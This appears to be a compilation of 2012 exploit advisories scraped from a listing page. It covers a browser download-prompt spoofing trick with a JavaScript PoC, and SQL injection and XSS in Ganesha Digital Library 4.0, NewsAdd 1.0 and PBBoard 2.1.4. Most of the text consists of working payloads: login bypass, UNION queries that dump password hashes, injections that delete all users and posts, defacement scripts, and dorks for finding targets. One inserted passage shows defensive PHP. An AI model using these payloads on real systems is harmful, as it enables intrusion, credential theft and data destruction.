It is an important and little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition: attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.

PoC: http://lcamtuf.coredump.cx/fldl/

==========
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">

<script>
var w;
var once;

function doit() {
  if (navigator.userAgent.indexOf('MSIE') != -1)
    w = window.open('page2.html', 'foo');
  else
    w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');
  setTimeout(donext, 4500);
}

function donext() {
  window.open('http://199.58.85.40/download2.cgi', 'foo');
  if (once != true) setTimeout(donext, 5000);
  once = true;
}
</script>
==========

More info: http://lcamtuf.blogspot.com/2012/05/yes-you-can-have-fun-with-downloads.html

It's closely related to many other fundamental, open issues with browser UI design - but I guess it's an interesting highlight.

/mz

Source: Browser Navigation Download Trick
  21. Stereo Light - Obsession (Radio Version) - YouTube
  22. Ganesha Digital Library 4.0 Multiple Vulnerabilities

=====================================================
Ganesha Digital Library 4.0 Multiple Vulnerabilities
=====================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities
: # Date : 30 May 2012
: # Author : X-Cisadane
: # Software Link : kmrg.itb.ac.id
: # Version : 4.x
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS Vulnerability
: # Tested On : Mozilla Firefox 7.0.1 (Windows)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai,Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

Description :
=============
Ganesha Digital Library (GDL) is a digital library software developed by Knowledge Management Research Group (KMRG) Institute of Technology Bandung (ITB) in order to harness the intellectual capital of ITB, which includes academic articles, journals, the final task, thesis, dissertation, research results, expertise and other directory.

Dorks :
=======
inurl:"/office.php?m="
intext:Copyright © 2002-2003 - KMRG ITB. All rights reserved
intext:This work was carried out with the aid of a grant from YLTI Indonesia and IDRC Canada.
intitle:" - GDL 4.0"

POC :
=====

[1] NON-Persistent XSS in the Account Activation Section
There is a security flaw (NON-Persistent XSS) in the Account Activation Section.
Activate Account in the left corner Menu. Then you'll be taken to Activate Account Page,
Fill this script : '"><script>alert(1337)</script> on the Account Field and Code Field
Then Click Activate.

[2] NON-Persistent XSS in the Search Section
XSS Script : '"><script>alert(1337)</script>
For Example : http://server/pustaka/search.php?s=[Insert XSS Script]

[3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script]
XSS Script : '"><script>alert(1337)</script>
For Example :
Type XSS Script like this ---> http://server/office.php?m=lang&langid='"><script>alert(1337)</script> AND PRESS ENTER!
Then you'll be taken to Error Page.
Then edit the URL like this ---> http://server/office.php?m=lang&langid=en AND PRESS ENTER!
If it is successful, a message box "1337" will appear.
P.S : Login Required!

[4] NON-Persistent XSS DEFACING
XSS Script : http://server/publisher.php?id=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni, Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit http://xcode.or.id";</script>

[5] SQL Injection on The Login Form (Gain SuperUser Access!)
Open Ganesha Digital Library 4.0 Login Page
For the example : Open http://server/login.php
On the Account Field, Fill with this Symbol : '=0#
On the Password Field Don't Fill Anything!!!
Then Click Login Button.
If it is successful, you'll get Superuser GDL access!
You can try another site such as : http://server/login.php

[6] SQL Injection on go.php?id=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA BLA&start=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA BLA&start=START ID BLA BLA BLA&node=['SQL]
For Example :
http://server/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848
http://server/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785
http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a

[7] SQL Injection on publisher.php?id=['SQL]
For Example : http://server/publisher.php?id=%27JBPEDONFAU

[8] SQL Injection on go.php?node=['SQL]
For Example : http://server/go.php?node='191
P.S : Login Required!

[9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0
For Example : http://server/office.php?m=explorer&a='191&b=expand&w=0
P.S : Login Required!

[10] SQL Injection on office.php?m=user&a=['SQL]
For Example : http://server/office.php?m=user&a='pdsony@idola.net.id&b=edit
P.S : Login Required!

[11] SQL Injection on office.php?m=workgroup&a=['SQL]&b=edit
For Example : http://server/office.php?m=workgroup&a='1&b=edit
P.S : Login Required!

[12] SQL Injection on office.php?m=user&so=desc&sb=['SQL]
For Example :
http://server/office.php?m=user&so=desc&sb='FULL_NAME
http://server/office.php?m=user&so=asc&sb='EMAIL
http://server/office.php?m=user&so=asc&sb='GID
http://server/office.php?m=user&so=asc&sb='CONFIRM
P.S : Login Required!

Source: Ganesha Digital Library 4.0 Multiple Vulnerabilities
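Every finding in this post is a request parameter reaching either the page or the database unchanged: the XSS strings break out of an HTML attribute with `'">`, and the numeric `node=` / `start=` values accept a leading quote. The following is an added example (not GDL code) of how a `search.php?s=` and `go.php?node=` style page is written so that neither happens; the table and column names and the database credentials are my placeholders.

```php
<?php
// Added example (not Ganesha Digital Library code): reflected-parameter
// handling that encodes output for its context and validates numeric ids
// before they are bound into a prepared statement.
// Assumptions: mysqli connection $db (placeholder credentials) and an assumed
// "nodes(id, title)" table.

function h(string $s): string
{
    // ENT_QUOTES encodes ' and " as well as < > &, so the value is inert inside
    // an attribute (where the '"><script> payload above breaks out) and in text.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function node_id(array $query): ?int
{
    // Ids are validated as positive integers; "'191" is rejected rather than quoted.
    $v = filter_var($query['node'] ?? null, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

function find_node(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT title FROM nodes WHERE id = ?');  // assumed table
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$db   = new mysqli('localhost', 'gdl', 'PLACEHOLDER_PASSWORD', 'gdl'); // placeholder
$term = $_GET['s'] ?? '';
$id   = node_id($_GET);
$node = $id !== null ? find_node($db, $id) : null;
?>
<!-- The search term is reflected inside an attribute and as text; both go through h() -->
<form method="get"><input name="s" value="<?= h($term) ?>"></form>
<p>Results for <?= h($term) ?></p>
<?php if ($node): ?>
<h2><?= h($node['title']) ?></h2>
<?php elseif ($id === null): ?>
<p>Invalid node id</p>
<?php endif; ?>
```

Two points are easy to miss: encoding must be chosen per output context (attribute and text are covered here, but a value dropped into a `<script>` block or a URL needs a different encoder), and validating an id as an integer is what makes the `'191` style inputs fail early instead of relying on the parameter binding alone.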
  23. NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities

# Exploit Title: NewsAdd <=1.0 Multiple SQL Injection
# Google Dork: -----------------------------------
# Date: 2012/05/29
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql
# Version: 1.0
# Tested on: Debian GNU/Linux

Developer URL: http://tvaini.ueuo.com/

Vulnerabilities discovered by WhiteCollarGroup
www.wcgroup.host56.com
whitecollar_group@hotmail.com

If you install NewsAdd on your system for testing, note that some servers have problems with tabulation.
Therefore, replace the second query:

--- begin ---
CREATE TABLE IF NOT EXISTS 'comentario' (
'id' int(11) NOT NULL AUTO_INCREMENT,
'id_noticia' int(11) NOT NULL,
'usuario' varchar(15) NOT NULL,
'comentario' text NOT NULL,
'data' datetime NOT NULL,
PRIMARY_KEY('id')
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ;
--- end ---

By this:

--- begin ---
DROP TABLE IF EXISTS `comentario`;
CREATE TABLE `comentario` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`id_noticia` int(11) NOT NULL,
`usuario` varchar(15) NOT NULL,
`comentario` text NOT NULL,
`data` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--- end ---

We discovered five SQL Injection vulnerabilities on public access.

 _
|_| Vulnerabilities before login

 /
|  SQL Injection on the search form
 \

The first vulnerability is in the search form, on index.
Paste this in it:
%' UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc

You will get a unique line like:
admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0

Lines are separated by commas (",") and columns, by "<=>".
In the return, we have two lines:
admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0
user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0

Here, we have the columns as follows:
email <=> username <=> md5(password) <=> admin? <=> banned?

 /
|  SQL Injection on comments
 \

For this, you must be a user. Register on the "cadastro.php" form.
After, access:
http://domain/comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+

You will view a line like the previous example.

 _
|_| Vulnerabilities after login

 /
|  Delete all posts
 \
/admin/removerNoticia.php?id=0' or '1'='1&conf=sim

 /
|  Ban all users
 \
/admin/listarUsuarios.php?acao=banir&id=0' or '1'='1

 /
|  Delete all users
 \
/admin/removerUsuario.php?id=0' or '1'='1&conf=sim

Note that if you delete all users, you will lose access to the system.

Source: NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities
  24. PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities

# Title: PBBoard v2.1.4 multiple SQLi Vulnerabilities
# Version: 2.1.4
# Author/Found by: loneferret
# Software Site: http://www.pbboard.com/PBBoard_v2.1.4.zip
# Other vulnerabilities: http://www.exploit-db.com/exploits/18937/
# Date found: May 29th 2012
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23

# Vulnerability:
# Due to improper sanitization, many of the parameters are injectable.
# Need a user account to trigger these.
# As always you can have fun...

PoC:
Page: Personal Options settings
Parameters: style= lang= hide_online= user_time= send_allow= pm_emailed= pm_window= visitormessage=
Method: POST

POST DATA:
style=1?=1&hide_online=0&user_time=0&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=2' where id='2' and sleep(5)#&send=Save

By changing the 'id' number used in the 'where' clause, you can modify another user's settings.
Id=1 being admin you can, for example, change his/her timezone

POST DATA:
style=1?=1&
hide_online=0&user_time=+10&
send_allow=1&
pm_emailed=0&
pm_window=1&
visitormessage=2' where id='1'#&send=Save

Another thing, you can get an XSS using the MySQL's error message. Which is always funny.

POST DATA:
style=1&
lang=1&
hide_online=0
&user_time=+10&
send_allow=1&
pm_emailed=0&
pm_window=1&
visitormessage=<script>alert('xss');</script>#&send=Save

PoC #2:
Here's another example, where we get mysql to sleep for 5 seconds, as well as change the admin's (id=1) avatar.

Page: Change avatar
Parameter: avatar_path=
Method: POST

POST DATA:
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="options"\r\n
\r\n
list\r\n
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="avatar_list"\r\n
\r\n
look/images/avatar/coof.jpg' where id='1' and sleep(5)#\r\n    <--Right Here
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="avatar"\r\n
\r\n
http://\r\n
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="upload"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------68511802421187978011060806853\r\n
Content-Disposition: form-data; name="change_avatar"\r\n
\r\n
Edit Settings\r\n
-----------------------------68511802421187978011060806853--\r\n

PoC #3:
SQLi in the cookie. Just need to modify the cookie value using your favorite tool.
Parameter: PowerBB_username & PowerBB_password

PowerBB_username=loneferret' and sleep(5)#
or
PowerBB_password=e10adc3949ba59abbe56e057f20f883e' and sleep(5)#

(and if you're wondering there are 58 fields)

Source: PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities